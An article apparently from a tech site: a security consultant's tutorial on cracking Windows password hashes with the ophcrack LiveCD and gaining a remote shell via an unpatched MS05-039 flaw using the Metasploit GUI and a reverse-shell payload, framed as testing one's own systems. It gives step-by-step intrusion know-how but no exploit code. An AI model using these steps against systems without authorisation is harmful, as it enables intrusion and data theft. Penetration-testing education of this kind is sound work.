How to exploit two common Windows vulnerabilities

In a previous tip about the 10 most common Windows vulnerabilities, I outlined the Windows flaws I see the most in my security assessment work. Now I want to take the two particular vulnerabilities I see more than any others and show you how they're exploited. You can then use these techniques on your Windows systems to find the holes before a malicious user does. One exploit is relatively non-technical and the other goes a little more in-depth but certainly doesn't require "elite" hacker skills. Either way, you can execute each of them using free tools in a matter of minutes. Let's jump right in.

Unencrypted laptops

First, let's look at the problem with unencrypted laptop drives. Given all the data breaches related to mobile systems, this is arguably one of the greatest business risks security administrators face today. Here's how a Windows-based system running any version of Windows can be owned in, say, 30 minutes or less.

Step 1: Download/install the current version of the ophcrack LiveCD and burn the ISO image onto CD. You can also carry out this exploit with the commercial Elcomsoft System Recovery program and similar tools, but I'll stick with the freebie for this exercise.

Step 2: Boot your test system from the ophcrack LiveCD. After it loads the operating system, the application and the default rainbow tables (which can take a few minutes), the program will automatically go to work on the local Windows password hashes. It will crack any LanManager (LM)-based hashes with relative ease. A couple of sample passwords (a blank one and a very basic one) discovered are shown in Figure 1.

Click all images to enlarge.
Figure 1:
[IMAGE]
Use the Ophcrack ...

Digg This!     StumbleUpon     Del.icio.us

RELATED CONTENT Patches, alerts and critical updates Underlying causes of inconsistent patch management Microsoft's Online Desktop Manager caters to small IT shops Microsoft's Patch Tuesday brings a bumper crop of security fixes Act fast with five critical September patches Microsoft's August patches run the gamut Patching third-party browsers adds more work in Windows shops Troubleshooting Microsoft WSUS connectivity issues Windows security tools for the busy desktop administrator The state of enterprise security and emerging threats in 2009 Why should Windows shops use Microsoft Baseline Security Analyzer? Microsoft Windows Vista operating system Windows 7 launches, offers salvation from Vista An intro to Windows 7's Deployment Image Servicing and Management tool Guide to converting from Windows XP to Windows 7 Choosing the best way to install images Has Microsoft corrected Vista annoyances in Windows 7? Microsoft's August patches run the gamut Your questions answered: The Windows 7 upgrade quandary Windows Vista users get little pricing relief on Windows 7 Combining folder redirection with roaming profiles IPv6 protocol, Windows Vista features simplify peer ad-hoc networking User passwords and network permissions Eight is too many characters for strong passwords Nine common password oversights to avoid Secure your Windows systems with proper password practices Managing multiple passwords in Windows Windows desktop endpoint security challenges podcast series How to strike a balance between Windows security and business needs Managing single sign-on security burdens in Windows Build secure computer password policies Remote user security checklist Reduce resistance to creating strong computer passwords

RELATED GLOSSARY TERMS Terms from Whatis.com − the technology online dictionary drive-by download  (SearchEnterpriseDesktop.com)

RELATED RESOURCES 2020software.com, trial software downloads for accounting software, ERP software, CRM software and business software systems Search Bitpipe.com for the latest white papers and business webcasts Whatis.com, the online computer dictionary

LiveCD to crack Windows passwords.

It only took a few minutes to crack these. More complex ones can be uncovered in short order too.

Step 3: Once the initial cracking is done and it still didn't find them all, you can click "Load" to load up previously downloaded or purchased rainbow tables that can crack more complex Windows hashes, such as the NTLM hashes that Vista uses.

Step 4: Now that one -- and likely all -- password hashes have been cracked, you simply shut down the ophcrack LiveCD, reboot the system into Windows and log in using your recovered password(s). An administrator-level login will buy you more, but you can almost always find sensitive information and stored passwords and even gain access to Windows domains and VPNs as a standard Windows user. The system is yours.

I can't think of a better way to demonstrate the need for laptop drive encryption.

For the second example, let's look at how easy it is to gain full remote access to a Windows system by exploiting a missing patch vulnerability.

Step 1: Run your favorite vulnerability scanner against your network and look for Windows systems that have vulnerabilities related to missing patches. These findings typically reference Microsoft remote code execution bulletins such as MS05-039 and MS06-040 (yes -- oldies but goodies I often come across). Figure 2 shows a QualysGuard finding that indicates a missing MS05-039 patch.

Figure 2:
[IMAGE]
QualysGuard report highlights an exploitable Windows vulnerability.

Step 2: Download/install the current version of Metasploit -- a free exploitation tool that can be used to demonstrate what happens when Windows systems aren't properly patched.

Step 3: Search the Metasploit exploit interface for a matching exploit. In Figure 3, using the MS05-039 example, you can see that Metasploit does indeed have an exploit that can be carried out on the target system.

Figure 3:
[IMAGE]
Search the Metasploit database to confirm an exploit is available.

This is a rudimentary -- and often frustrating -- way of connecting the dots and finding out what can be exploited, but it's the only reasonable way to go about it.

Step 4: Use the MSF Assistant GUI to plug in some basic variables for running your exploit. I typically use a reverse command shell (generic/shell_reverse_tcp) for the payload so I can demonstrate remote command prompt access, but there are many others you can select from such as add user and dllinject. Specific steps for carrying out the MS05-039 exploit are shown in Figures 4 through 8.

Figure 4:
[IMAGE]
Select the MS05_039_pnp exploit under Windows/SMB.

Figure 5:
[IMAGE]
Select your target version of Windows (if you don't know it, try them all).

Figure 6:
[IMAGE]
Select the payload (what you want it to do upon exploitation).

Figure 7:
[IMAGE]
Enter the IP address of the target system and your local system.

Figure 8:
[IMAGE]
Click Apply and voilà! You're done.

Step 5: You'll now be presented with a command prompt on the remote system. The drive is yours.

Take these techniques and tools for a spin and see what holes you can find -- and plug in a hurry -- while you can. There are plenty of other exploits you can carry out against your systems -- enough to fill an entire book. In fact, I (and many others) have done just that, so know this is just the beginning of your Windows security testing endeavors. Once you get these common Windows issues out of the way, you can tackle websites/apps, databases, wireless networks and so on -- the fun's never ending!

About the author: Kevin Beaver is an information security consultant, keynote speaker and expert witness with Atlanta-based Principle Logic LLC where he specializes in performing independent security assessments. Kevin has authored/co-authored seven books on information security including Hacking For Dummies and Hacking Wireless Networks For Dummies (Wiley). He's also the creator of the Security On Wheels information security audio books and blog providing security learning for IT professionals on the go. Kevin can be reached at kbeaver@principlelogic.com.